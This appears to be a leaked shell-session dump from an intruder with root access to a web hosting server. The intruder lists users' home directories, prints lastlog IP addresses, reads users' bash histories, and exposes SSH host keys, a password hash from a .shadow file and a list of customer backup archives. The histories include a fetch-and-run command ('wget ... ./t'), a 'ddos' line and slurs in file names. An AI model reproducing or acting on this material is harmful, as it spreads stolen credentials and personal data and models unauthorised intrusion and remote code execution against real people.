-nw1ZMHvmPzZ1cNLYwYYmUWVw5xncnMe/S/yyTwQ23kpDf6Ut0z/wpKeQd+m3XTiwzDU -NsKLdIkUpZLucbqjBE1XlNF9pHqKqX1j5rvZN/rCNREdJkChWk2KRddSdBOg/Oc81tl -OX6Fjv9zLglbo2y7Ojqx2eML/zifxTTTF82V0czG/bsXdtdhcW4JtVXVoN1iUcvEvZK -AyEN41N/OZDAqUGaEYAjqDpmI/JJM3uCKDl1qelt0iuWZLEOivUp6emnjiQNPKF4Sb1 -silje6uETSsjK/n8mIi1YmO/KNRg+MM9LQ2EWe/cS+xAJwyeDT9WiY/k867FjlXxIBP -cu3Lw== -[72.20.6.22]:5000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvmD6suMeQqo2o -NRg9p4nzWttZZfLC1Uhmmnv/Y7YyQRjvBBjr5rAPdbfLxY6nsc4/f6JDmwNKdIn0j6L -AcjFak/kuf7rAJwcolrsRxm4C5LH89D+r32t7guOI9hPgA0R38N7k7q2ykQlDNGyuMJ -p+1UXSAe8t0E+2VSgrr173rqNe+1oRaPWHcUdwoN9O+VmTVg+uS+cvlLSVue8BrUCZS -vcDAOdMXeSOos7kibaQ181juAjHp+xEHd0zfdQxzItP9mMz0lqnY+J/miHuu6sm4G3E -7WEXBLFjaTIZx3OzEg3eDBKpK8EYzXkYY5aq4eNNfCmqZqWdjnEBUwNCxrKGQ== -[72.20.6.190]:9000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAneqXXAJ+LhaK -Kc6z2ugq1C6CojO0ylJCaZaO9WCL1CfstSGVBaEgYUq7qk7MtgGq71IIHuaYTE5KoXR -6l8P+pZaONa/2vSCbmdOg7q/9xBQwmuXC8zKEnR7IqPqYL5idFioGV1G2dWYMTFJySQ -MPI96jW1a4iu5AL61zC2WEr9f8jDjGQ8+FTx8u7zX8GEaEJAQQEr99CpDq29jp7pKNF -BOSo9OW5mDJt2Q8NOotExSdEkmkxrEBcOFshfiEmY99lm4QCjOFVDSxdH5s0VNKdYu0 -FBfMRlEh+UXFtL29BuEQUZnMwqU2NqCJknQ1gQawn8pQfYkpf4vBsu/h4/p2ow== -[root@demon2 ~]# cd /home -[root@demon2 home]# ls -al -total 252 -drwx--x--x 50 root root 4096 Mar 27 16:19 . -drwxr-xr-x 27 root root 4096 Mar 11 00:10 .. -drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 40zzz -drwx--x--x 17 admin admin 4096 Feb 11 22:44 admin -drwx--x--x 6 alliancedn alliancedn 4096 Aug 1 2007 alliancedn -drwx--x--x 8 aosw aosw 4096 Aug 1 2007 aosw --rw------- 1 root root 13312 Apr 21 05:01 aquota.group --rw------- 1 root root 13312 Apr 21 05:01 aquota.user -drwxr-xr-x 3 root root 4096 Jan 14 00:10 asbestos -drwx--x--x 9 barnseo barnseo 4096 Mar 5 23:19 barnseo -drwx--x--x 6 bnc bnc 4096 Aug 8 2007 bnc -drwx--x--x 6 bored bored 4096 Aug 1 2007 bored -drwx--x--x 6 churc0 churc0 4096 Aug 1 2007 churc0 -drwx--x--x 6 connors connors 4096 Aug 1 2007 connors -drwx------ 3 cstest cstest 4096 Dec 11 17:29 cstest -drwx------ 2 cunt cunt 4096 Mar 13 17:26 cunt -drwx--x--x 5 dougie dougie 4096 Dec 20 16:28 dougie -drwx--x--x 10 egg egg 4096 Mar 23 11:26 egg -drwx--x--x 6 every every 4096 Aug 1 2007 every -drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 evilcode -drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 excodeirc -drwx--x--x 6 exploiterc exploiterc 4096 Dec 15 13:10 exploiterc -drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 felosi -drwx--x--x 6 felosii felosii 4096 Aug 1 2007 felosii -drwxr-xr-x 2 root root 4096 Apr 22 2007 ftp -drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 g00ns83 -drwx--x--x 10 g00nsts395 g00nsts395 4096 Apr 16 19:57 g00nsts395 -drwx--x--x 7 grumpy grumpy 4096 Aug 1 2007 grumpy -drwx--x--x 4 hackrad hackrad 4096 Aug 2 2007 hackrad -drwx--x--x 5 hanon hanon 4096 Mar 23 16:25 hanon -drwx------ 2 silc silc 4096 Jan 4 23:12 help -drwx--x--x 7 hthhost hthhost 4096 Dec 30 14:59 hthhost -drwx------ 2 ident ident 4096 Feb 1 00:01 ident -drwx--x--x 7 illmob illmob 4096 Apr 1 04:21 illmob -drwx--x--x 5 lost lost 4096 Feb 19 19:07 lost -drwx------ 2 root root 16384 Jul 31 2007 lost+found -drwx--x--x 6 mycorp mycorp 4096 Aug 2 2007 mycorp -drwx--x--x 8 party party 4096 Mar 7 18:20 party -drwx--x--x 5 partyvan partyvan 4096 Jan 1 15:04 partyvan -drwx--x--x 7 pingyill pingyill 4096 Aug 1 2007 pingyill -drwx--x--x 5 564 565 4096 Mar 9 11:56 pr0be -drwx--x--x 5 pvannet pvannet 4096 Mar 26 19:13 pvannet -drwx--x--x 6 ragedns ragedns 4096 Aug 2 2007 ragedns -drwx--x--x 6 rageserver rageserver 4096 Aug 1 2007 rageserver -drwx--x--x 6 robo robo 4096 Aug 1 2007 robo -drwx--x--x 15 shoutcas shoutcas 4096 Aug 6 2007 shoutcas -drwx------ 3 silc silc 4096 Jan 18 16:08 silc -drwx--x--x 7 sixtyz sixtyz 4096 Apr 16 19:09 sixtyz -drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 sn00g3s -drwxrwxrwt 2 root root 4096 Apr 21 00:10 tmp -drwx------ 5 tribal tribal 4096 Mar 26 07:36 tribal -drwx--x--x 6 void void 4096 Aug 1 2007 void -[root@demon2 home]# lastlog | grep -v Never -Username Port From Latest -root pts/1 74-34-107-191.ds Mon Apr 21 03:44:04 -0700 2008 -barnseo pts/1 86.121.190.64 Wed Mar 5 23:05:21 -0800 2008 -bnc pts/1 78.129.174.155 Sat Apr 19 20:27:10 -0700 2008 -partyvan pts/5 cpe-76-174-156-5 Tue Jan 1 15:27:39 -0800 2008 -[root@demon2 home]# cd 40zzz -[root@demon2 40zzz]# ls -al -total 24 -drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw-r--r-- 1 40zzz 40zzz 24 Dec 21 21:57 .bash_logout --rw-r--r-- 1 40zzz 40zzz 176 Dec 21 21:57 .bash_profile --rw-r--r-- 1 40zzz 40zzz 124 Dec 21 21:57 .bashrc -[root@demon2 40zzz]# cd ../admin -[root@demon2 admin]# ls -al -total 119196 -drwx--x--x 17 admin admin 4096 Feb 11 22:44 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -lrwxrwxrwx 1 root root 21 Sep 13 2007 admin_backups -> /backup/admin_backups -drwxrwxr-x 2 admin admin 4096 Aug 1 2007 admin_backups1 -drwx------ 2 admin admin 4096 Aug 1 2007 backups --rw------- 1 admin admin 5774 Feb 11 22:50 .bash_history --rw-r--r-- 1 admin admin 304 Apr 27 2006 .bash_logout --rw-r--r-- 1 admin admin 191 Apr 27 2006 .bash_profile --rw-r--r-- 1 admin admin 124 Apr 27 2006 .bashrc --rw-rw-r-- 1 admin admin 6090 Jul 2 2007 da.cpanel.import.9beta1.tar.gz --r--r--r-- 1 admin admin 20320 May 26 2007 da.cpanel.import.pl --rwxr-xr-x 1 admin admin 272 Aug 6 2007 defaults.conf -drwxr-xr-x 9 admin admin 4096 Jul 4 2007 domains -drwx------ 2 admin admin 4096 Sep 29 2007 .elinks --rw-r--r-- 1 admin admin 383 Apr 27 2006 .emacs -drwxr-xr-x 4 admin admin 4096 Aug 1 2007 ex -drwxrwxr-x 2 admin admin 4096 Oct 11 2007 export -drwxrwx--- 5 admin admin 4096 Aug 1 2007 imap -drwxrwxr-x 2 admin admin 4096 Oct 11 2007 import -drwx------ 2 admin admin 4096 Aug 1 2007 mail -drwxrwxr-x 2 admin admin 4096 Jan 4 2007 .mc -drwxr-xr-x 6 admin admin 4096 May 15 2006 modsecurity-apache_1.9.4 --rw-rw-r-- 1 admin admin 496805 Jan 11 2007 modsecurity-apache_1.9.4.tar.gz --rw------- 1 admin admin 419 Sep 29 2007 .nessusrc -drwxr-xr-x 2 admin admin 4096 Jul 3 2007 public_html --rw-r--r-- 1 admin admin 55412 Jul 3 2007 rulezz.conf --rw-r----- 1 admin mail 34 Jun 29 2007 .shadow -drwx------ 2 admin admin 4096 Aug 1 2007 .ssh --rwx------ 1 admin admin 8515 Feb 10 15:41 t --rw-r--r-- 1 admin admin 213250 Aug 1 2007 user.admin.alliancedn.tar.gz --rw-r----- 1 admin admin 120993882 Aug 1 2007 user.admin.sn00g3s.tar.gz -drwx--x--x 2 admin admin 4096 Dec 8 10:00 user_backups -drwxr-xr-x 3 admin admin 4096 Sep 29 2007 webmail -[root@demon2 admin]# cat .bash_history -cd -cd user_backups -ftp premshells.com -ping rst-crew.net -exit -cdf -cd -cd user_backups -ftp premshells.com -uptime -nst -exit -cd -cd userbackups -cd user_backups -ftp blackhat-hosting.com -exit -ftp black-hosting.com -ftp blackhat-hosting.com -updatedb -exit -nano -w /etc/apf/deny_hosts.rules -exit -cd user_backups -cd -cd user-backups -cd user_backups -ls -cp rosec.tar.gz /home/admin/domains -cd /home/admin/domains -ls -mv rosec.tar.gz cpl.alliancedns.com -cd cpl.alliancedns.com -mv rosec.tar.gz public_html -exit -cd -mc -chmod 644 rosec.tar.gz -exit -cd -ls -rm -rf backup user_backups -mkdir /home/admin/admin_backups -ping zone-h.org -exit -cd -ls -ls -mkdir user_backups -cp *.tar.gz user_backups -exit -cd -chmod 755 domains -ls -la domains -exit -cd -chmod 755 domains -cd -exit -cd -ls -mv *.tar.gz user_backups -ls -ls user_backups -exit -crontab -e -exit -cd -ls -ls admin_backups -rm -rf admin_backups -cat /etc/hosts -ls -mkdir admin_backups -exit -cd -cd admin* -ls -ls -ls -exit -cd -ls -cd admin* -ls -rm -rf */tar.gz -ls -rm -rf *tar.gz -ls -exit -cd -cd admin* -ls -cat /etc/hosts -exit -cd -ls -mv user.admin.aosw.tar.gz admin_backups -ls admin* -ls -la admin* -top -exit -cd -ls -rm -rf backup-8.1.2007_11-19-41_g00ns83.tar.gz -wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz' -wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz -tar zxvf da.cpanel.import.9beta1.tar.gz -nano -w defaults.conf -exit -nano -w defaults.conf -chmod 755 defaults* -nano -w defaults.conf -mkdir import export -rm -rf import -mv cp import -ls -perl da.cpanel.import.pl -mkdir user_backups -perl da.cpanel.import.pl -ls user* -ls -la export -cd -ls -cd export -ls -rm -rf niggerma.tar.gz sevenz.tar.gz -mv *.tar.gz ../user_backups -ls -cd .. -ls -la user_backups -exit -cd -ls -ls -la -rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz -ls import -cd import -ls -la -rm -rf backup* -ls -la -ls -la -ls -la -ls -la -exit -cd -ls -la -cd import -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz -ls -ddos -exit -cd -cd import -ls -ls -cd -wget nix101.com/mod.tar.gz -wget http://www.modsecurity.org/download/modsecurity-apache_1.9.4.tar.gz -tar zxvf modsecurity-apache_1.9.4.tar.gz -cd mod* -cd apache1 -apxs -apxs -cia mod_security.c -yum install httpd-devel -exit -cd -cd import -ls -exit -cd -cd import -ls -cd -ls -cd import -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -nst -exit - -cd -cd import -ls -la -ls -la -ls -la -ls -la -ls -la -exuit -exit -cd -cd import -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -ls -la -exit -\cd -ls -perl da.cpanel.import.pl -cd export -ls -mv g00ns* ../user_backups -ping demon2.rage-servers.com -cd -cd /backup -ls -nano test -rm -rf test -exit -cd -ls -ls backup -rm -rf backup -top -exit -su admin -id -cd -ls -ls export -exit -cd -cd import -ls -rm -rf *.tar.gz -ftp 209.200.50.124 -ls -rm -rf back* -cd -cd import -ftp 209.200.50.124 -quit -ftp 209.200.50.124 -cd -ls -nano -w defaults.conf -perl da.cpanel.import.pl -ls export -cd import -ls -cd -cd export -ls -cp shoutcas.tar.gz ../user_backups -cd /home/shou* -exit -cd -ls -ls -la export -ls -la user_backups -exit -cd -csf -a 72.20.1.46 -exit -cd -ftp 72.20.1.46 -ls -mv your* user_backups -exit -cd -cd domains -ls -cd premshells.com -ls -cd public_html -ls -exit -cd -cd domains -cd prem* -wget protectedhost.com/stat.tar.gz -tar zxvf stat* -LS -ls -tar zxvf stat.tar.gz -mv status public_html -cd -cd domains -ls -cd premshells.com -cd public_html; -wget http://enterprise.bidmc.harvard.edu/pub/nessus-php/nessus-php-0.7.tar.gz -tar zxvf nessus-php-0.7.tar.gz -mv nessus-php-0.7/ nes -links http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386 - .rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4 -wget http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386. - rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4 -rm -rf index.html.1 -killall links -wget shitonkikes.com/Nessus-3.0.6-es5.i386.rpm -rpm -i Nessus-3.0.6-es5.i386.rpm -exit -exit -./configure -cd /opt -ls -cd ness* -ls -ls sbin -sbin/nessus-adduser -exit -cd -cd import -ftp cp2.secureservertech.com -cd .. -ls -nano -w defaults.conf -ls import -rm -rf import/backup-8.6.2007_22-02-36_shoutcas.tar.gz -perl da.cpanel.import.pl -ls export -cp export/stockegg* user_backups -ls user-Backups -ls user_backups -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -ping www.stockegg.com -service named restart -exit -cd -cd user_* -ls -ftp sst0.com -cd -cd user_* -ls -la aryan88* -ftp sst0.com -exit -cd -cd user_* -ftp sst0.com -cd -ls -exit -cd -ls -wget fearlesshost.com/t -chmod 700 t -./t -exit -[root@demon2 admin]# ls -al .ssh -total 12 -drwx------ 2 admin admin 4096 Aug 1 2007 . -drwx--x--x 17 admin admin 4096 Feb 11 22:44 .. --rw-r--r-- 1 admin admin 220 Aug 1 2007 known_hosts -[root@demon2 admin]# cat .ssh/* -72.20.1.46 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6qCFv8UowWc3dcRnWqzz4tPsx4Glt -EUA4rRmt/tsP0T4bsddMuF0yYvaSHVAZNjZwfup0heDh/cCs08AiGlKDL3yvNO4nTa/sXKr1AJ0W -dg0GMnhT+D0Mu8PXdCKhIfPZLsaW5p45WYmwy6afKxM20wZNVKw3YTXJweFE6n0s9M= -[root@demon2 admin]# ls -al /backup/admin_backups -total 28936116 -drwxr-xr-x 2 admin admin 4096 Dec 30 16:49 . -drwxr-xr-x 6 admin admin 4096 Feb 1 03:03 .. --rw-r----- 1 admin felosi 11560 Sep 14 2007 admin.admin.felosi.tar.gz --rw-r----- 1 admin admin 11404750600 Dec 18 21:28 admin.root.admin.tar.gz --rw-r----- 1 admin admin 35395367 Aug 11 2007 reseller.admin.aaatrans.tar.gz --rw-r----- 1 admin 535 2166835881 Sep 14 2007 reseller.admin.bwhost.tar.gz --rw-r----- 1 admin 503 27875 Sep 14 2007 reseller.admin.llythexic.tar.gz --rw-r----- 1 admin 549 8597301 Sep 14 2007 reseller.felosi.brinkhos.tar.gz --rw-r----- 1 admin 552 5638521 Sep 14 2007 reseller.felosi.burn.tar.gz --rw-r----- 1 admin alliancedn 264984 Dec 30 16:29 user.admin.alliancedn.tar.gz --rw-r----- 1 admin aosw 541773752 Sep 14 2007 user.admin.aosw.tar.gz --rw-r----- 1 admin 532 28274761 Sep 14 2007 user.admin.aryan88.tar.gz --rw-r----- 1 admin 538 518730829 Dec 30 16:29 user.admin.asbestos.tar.gz --rw-r----- 1 admin barnseo 16041617 Dec 18 21:29 user.admin.barnseo.tar.gz --rw-r----- 1 admin bnc 2082640 Dec 30 16:29 user.admin.bnc.tar.gz --rw-r----- 1 admin bored 3830711 Dec 18 21:29 user.admin.bored.tar.gz --rw-r----- 1 admin churc0 4341166 Dec 18 21:29 user.admin.churc0.tar.gz --rw-r----- 1 admin connors 652449 Dec 18 21:29 user.admin.connors.tar.gz --rw-r----- 1 admin dougie 5454961654 Dec 30 16:37 user.admin.dougie.tar.gz --rw-r----- 1 admin 558 20340587 Dec 18 21:37 user.admin.earn.tar.gz --rw-r----- 1 admin egg 5530647 Dec 30 16:37 user.admin.egg.tar.gz --rw-r----- 1 admin every 323268270 Dec 30 16:37 user.admin.every.tar.gz --rw-r----- 1 admin evilcode 1607382248 Dec 30 16:40 user.admin.evilcode.tar.gz --rw-r----- 1 admin excodeirc 113123361 Dec 30 16:41 user.admin.excodeirc.tar.gz --rw-r----- 1 admin exploiterc 273460363 Dec 18 21:43 user.admin.exploiterc.tar.gz --rw-r----- 1 admin felosii 202367 Dec 18 21:43 user.admin.felosii.tar.gz --rw-r----- 1 admin g00ns83 1922138751 Dec 30 16:44 user.admin.g00ns83.tar.gz --rw-r----- 1 admin g00nsts395 5616214 Dec 30 16:44 user.admin.g00nsts395.tar.gz --rw-r----- 1 admin grumpy 207859624 Dec 30 16:44 user.admin.grumpy.tar.gz --rw-r----- 1 admin 516 988823 Sep 14 2007 user.admin.hackersd.tar.gz --rw-r----- 1 admin hackrad 371198425 Dec 30 16:45 user.admin.hackrad.tar.gz --rw-r----- 1 admin 517 2334763 Dec 18 21:48 user.admin.high.tar.gz --rw-r----- 1 admin illmob 593721185 Dec 30 16:46 user.admin.illmob.tar.gz --rw-r----- 1 admin 519 104101941 Dec 18 21:49 user.admin.leetmach.tar.gz --rw-r----- 1 admin mycorp 147245 Dec 30 16:46 user.admin.mycorp.tar.gz --rw-r----- 1 admin partyvan 327144959 Dec 30 16:46 user.admin.partyvan.tar.gz --rw-r----- 1 admin pingyill 30825336 Dec 30 16:47 user.admin.pingyill.tar.gz --rw-r----- 1 admin ragedns 189555066 Dec 30 16:47 user.admin.ragedns.tar.gz --rw-r----- 1 admin rageserver 255007 Dec 30 16:47 user.admin.rageserver.tar.gz --rw-r----- 1 admin robo 290786 Dec 30 16:47 user.admin.robo.tar.gz --rw-r----- 1 admin shoutcas 385370416 Dec 30 16:48 user.admin.shoutcas.tar.gz --rw-r----- 1 admin sn00g3s 269230557 Dec 30 16:49 user.admin.sn00g3s.tar.gz --rw-r----- 1 admin 524 1468386072 Sep 14 2007 user.admin.vg114.tar.gz --rw-r----- 1 admin void 14594 Dec 30 16:49 user.admin.void.tar.gz --rw-r----- 1 admin 548 75815612 Sep 14 2007 user.admin.yourgift.tar.gz --rw-r----- 1 admin 551 626926 Sep 14 2007 user.brinkhos.bayw.tar.gz --rw-r----- 1 admin 555 30546 Sep 14 2007 user.burn.kid652.tar.gz --rw-r----- 1 admin 553 27271 Sep 14 2007 user.burn.lucasl123.tar.gz --rw-r----- 1 admin 554 24648 Sep 14 2007 user.burn.rsuchow.tar.gz --rw-r----- 1 admin 533 308158933 Sep 14 2007 user.bwhost.assault.tar.gz --rw-r----- 1 admin 526 4716486 Sep 14 2007 user.bwhost.ballardt.tar.gz --rw-r----- 1 admin 527 175245944 Sep 14 2007 user.bwhost.darkstorm.tar.gz --rw-r----- 1 admin 528 597461 Sep 14 2007 user.bwhost.mffclan.tar.gz --rw-r----- 1 admin 529 540182805 Sep 14 2007 user.bwhost.squad.tar.gz --rw-r----- 1 admin 530 903208 Sep 14 2007 user.bwhost.tnpreacher.tar.gz --rw-r----- 1 admin 531 71751894 Sep 14 2007 user.bwhost.xlostboyx.tar.gz --rw-r----- 1 admin 550 8486403 Sep 14 2007 user.felosi.prox.tar.gz -[root@demon2 admin]# ls -al backups -total 8 -drwx------ 2 admin admin 4096 Aug 1 2007 . -drwx--x--x 17 admin admin 4096 Feb 11 22:44 .. -[root@demon2 admin]# cat .shadow -$1$k67PPtsg$vReIxhUQshkQHrgN8qop4/ -[root@demon2 admin]# cd ../bnc -[root@demon2 bnc]# ls -al -total 364 -drwx--x--x 6 bnc bnc 4096 Aug 8 2007 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw------- 1 bnc bnc 6018 Apr 19 20:31 .bash_history --rw-r--r-- 1 bnc bnc 24 Aug 3 2007 .bash_logout --rw-r--r-- 1 bnc bnc 176 Aug 3 2007 .bash_profile --rw-r--r-- 1 bnc bnc 124 Aug 3 2007 .bashrc -drwx--x--x 3 bnc bnc 4096 Aug 3 2007 domains -drwxrwx--- 3 bnc mail 4096 Aug 3 2007 imap -drwx------ 2 bnc bnc 4096 Aug 3 2007 mail -drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 psybnc --rw-rw-r-- 1 bnc bnc 311715 Jun 4 2005 psyBNC-2.3.2-7.tar.gz -lrwxrwxrwx 1 bnc bnc 35 Aug 3 2007 public_html -> ./domains/bnc.g00ns.net/public_html --rw-r----- 1 bnc mail 34 Aug 3 2007 .shadow -[root@demon2 bnc]# cat .bash_history -cat -ls -ls public_html -cd public_html/ -ls -nano index.html -cd $home -ls -mkdir bnc1 -cd bnc1 -wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz -tar -zxvf psyBNC-2.3.2-7.tar.gz -cd psybnc -make menuconfig -./psybnc -./Psybnc -ls -make -./psybnc -./psybnc stop -ps -aux -kill 26364 -ls -ps -aux -kill 26364 -ls -ps -aux -kill 26364 -ps -aux -ls -nano psybnc.conf -./psybnc -ps -aux -w -who -users -kill 26364 -kill 26364 -kill -i 26364 -kill -9 26364 -ps -au -ps -aux -cd $home -ls -rm -rf bnc1 -users -wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz -tar zxvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc -ls -al -make menuconfig -make menuconfig -make -./psybnc -ps =aux -ps -ps -a -ps -A -kill -9 3365 -kill 3365 -cd psybnc/ -ls -pico psybnc.conf -text psybnc.conf -psybnc.conf -nano psybnc.conf -nano psybnc.conf -./[sybnc -./psybnc -w -ls -cd psybnc -ls -nano psybnc.conf -nano psybnc.conf -makesalt -./makesalt -cd tools -ls -cd .. -ls -cd scripts -ls -cd example/ -ls -cd .. -cd .. -ls -cd help -ls -cat ADDUSER.TXT -cd .. -ls -nano psybnc.conf -ls -cd log -ls -cat psybnc.log -cat psybnc.log -cat psybnc.log -cat psybnc.log -cat psybnc.log -cd .. -ls -nano psybnc.conf -nano psybnc.conf -cd log -cat log -cat psybnc.log -cat psybnc.log -cat psybnc.log -cd .. -ls -cd .. -ls -ps -aux -kill 4414 -ps -aux -kill 4414 -ps -aux -ls -rm -rf psybnc -ps -aux -kill 4414 -ps -aux -tar -zxvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc -ls -make menuconfig -ls -make -ls -./psybnc -nano psybnc.conf -ps -aux -ps -aux -ls -rm -rf psybnc.pid -kill 1463 -ps -aux -ls -kill 1463 -ls -ps -aux -./psybnc restart -./psybnc psybnc.conf -ps -aux -kill 1463 -ps -aux -ls -killall 1463 -kill 1463 -killall psybnc -ps -aux -kill -9 1463 -ps -aux -./psybnc -ps -aux -kill -9 2455 -ps -aux -nano psybnc.conf -nano psybnc.conf -./psybnc -cd log -nano log -ls -cat psybnc.log -cd .. -ls -nano psybnc.conf -cd .. -ls -rm -rf psybnc -tar zxvf psyBNC-2.3.2-7.tar.gz -ps -aux -kill -9 2558 -cd psybnc -ls -make -ps -aux -nano psybnc.conf -nano psybnc.conf -./psybnc -cd psybnc -nano psybnc.conf -cp psybnc.conf psybnc.1.conf -ls -cd psybnc -ls -cp psybnc.conf psybnc.1.conf -nano psybnc.1.conf -nano psybnc.1.conf -nano psybnc.1.conf -echo "" > psybnc.1.conf -nano psybnc.1.conf -./psybnc psybnc.1.conf -cd psybnc -ls -nano psybncchk -crontab -e -crontab -e -crontab -e -pwd -crontab -e -nano psybncchk -nano psybncchk -nano psybncchk -ps -aux -ps -aux -cd psybnc -cd log -ls -cat psybnc.log -cat psybnc.log -ls -cat USER1.TRL -cat USER2.TRL -cat USER3.LOG -cd .. -ls -cat psybnc.conf -cd log -cat psybnc.log -ls -cd .. -ls -nano psybnc.conf -nano psybnc.conf -nano psybnc.1.conf -nano psybnc.conf -cd tools -ls -cd .. -ls -cd key -ls -cd .. -ls -nano psybnc.1.conf -cd log -ls -cat psybnc.log -cd .. -ls -ps -aux -kill -9 3514 -ps -aux -./psybnc psybnc.conf -ls -cd psybnc -ls -nano psybnc.1.conf -nano psybnc.1.conf -grep -rn 'version' * -ps -aux -nano psybnc.1.conf -nano psybnc.conf -nano psybnc.1.conf -nano psybnc.1.conf -nano psybnc.1.conf -nano psybnc.1.conf -exit -crontab -crontab -h -crontab -l -ls -cd psybnc -ls -cp psybnc.1.conf psybnc.gso.conf -nano psybnc.gso.conf -nano psybnc.conf -nano psybnc.conf -nano psybnc.gso.conf -./psybnc psybnc.gso.conf -ls -cd psybnc -ls -cat psybnc.conf -cd psybnc/ -ls -nano psybnc.gso.conf -nano psybnc.conf -ls -w -who -users -ls psybnc -ls domains -ls public_html/ -ps -aux -uptime -uname -a -ls -cd psybnc/ -ls -mkdir probebnc -ls -cd probebnc -ls -ls -wget http://psybnc.info/download/psyBNC-2.3.2-7.tar.gz -tar -zxvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc/ -ls -./install -./setup -ls menuconf/ -ls -cd $user -ls -cd psybnc -ls -rm -rf probebnc/ -ps -aux -mkdir probe -ls -cd probe -ls -wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz -tar -zxvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc/ -ls -./install -./setup -./psybncchk -cd $user -ls -cd psybnc/ -ls -rm -rf probe -ls -mkdir probe -cd probe -ls -wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz -tar -xzvf psyBNC2.3.1.tar.gz -ls -tar -xzvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc/ -ls -nano config.h -make menuconfig -make -make menuconf -make menuconfig -ls -nano psybnc.conf -rm * -ls -rm -rf * -wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz -ls -cd $user -ls -cd psybnc/ -ls -cd probe/ -ls -rm -rf psybnc/ -ls -tar -xzvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc/ -ls -nano config.h -make menuconfig -make -ls -cd $user/psybnc/probe -cd $user -ls -cd psybnc/ -ls -cd probe/ -ls -rm -rf psybnc/ -tar -xzvf psyBNC-2.3.2-7.tar.gz -ls -cd psybnc/ -ls -make menuconfig -make -ls -./psybnc -cd -ps ax -kill -9 9128 12320 24226 28825 -cd psybnc -ps ax -./psybnc psybnc.1.conf -./psybnc -./psybnc psybnc.gso.conf -cd -ls -exit -ls -cd psybnc -ls -head psybnc.1.conf -head psybnc.gso.conf -./psybnc psybnc.gso.conf -ps -aiux -ps -aux -ps -aux -kill 21054 -kill -9 21054 -./psybnc psybnc.gso.conf -ls -cd psy -cd psybnc/ -ls -cd probe/ -ls -cd psybnc/ -ls -./psybnc -ps -aux -ls -nano psybnc.conf -nano psybnc.conf -nano psybnc.conf.old -nano config.h -nano psybnc.conf -nano log/psybnc.log -cd $user -ls -cd psybnc/ -ls -cd probe -ls -rm -rf psybnc/ -tar xzf psyBNC-2.3.2-7.tar.gz -ls -cd psy -cd psybnc -ls -./psybncchk -nano config.h -ls -nano REa -nano README -make menuconfig -make -ls -./psybnc -ps ax -kill 1536 -ls -ps ax -kill 9672 -ps ax -kill 9672 -ps axc -ps ax -ls -./psybnc psybnc.gso.conf -ps ax -kill 1536 -ps ax -kill -s 1536 -kill -9 9672 -ps ax -kill -9 1536 -ps ax -ls -./psybnc psybnc.gso.conf -ps ax -ps ax -kill -9 21041 -ps ax -kill -9 21047 -ps ax -kill -9 24942 -ps ax -ls -./psybnc psybnc.1.conf -ps ax -ls -./psybnc psybnc.gso.conf -ps ax -kill -9 ./psybnc psybnc.1.conf -kill -9 25484 -kill -9 25512 -ps ax -ls -./psybnc -cd help -ls -cd .. -ls -ps ax -./psybnc psybnc.1.conf -./psybnc -./psybnc psybnc.gso.conf -ps ax -ls -cd psybnc -ls -head psybnc.conf -head psybnc.1.conf -ls 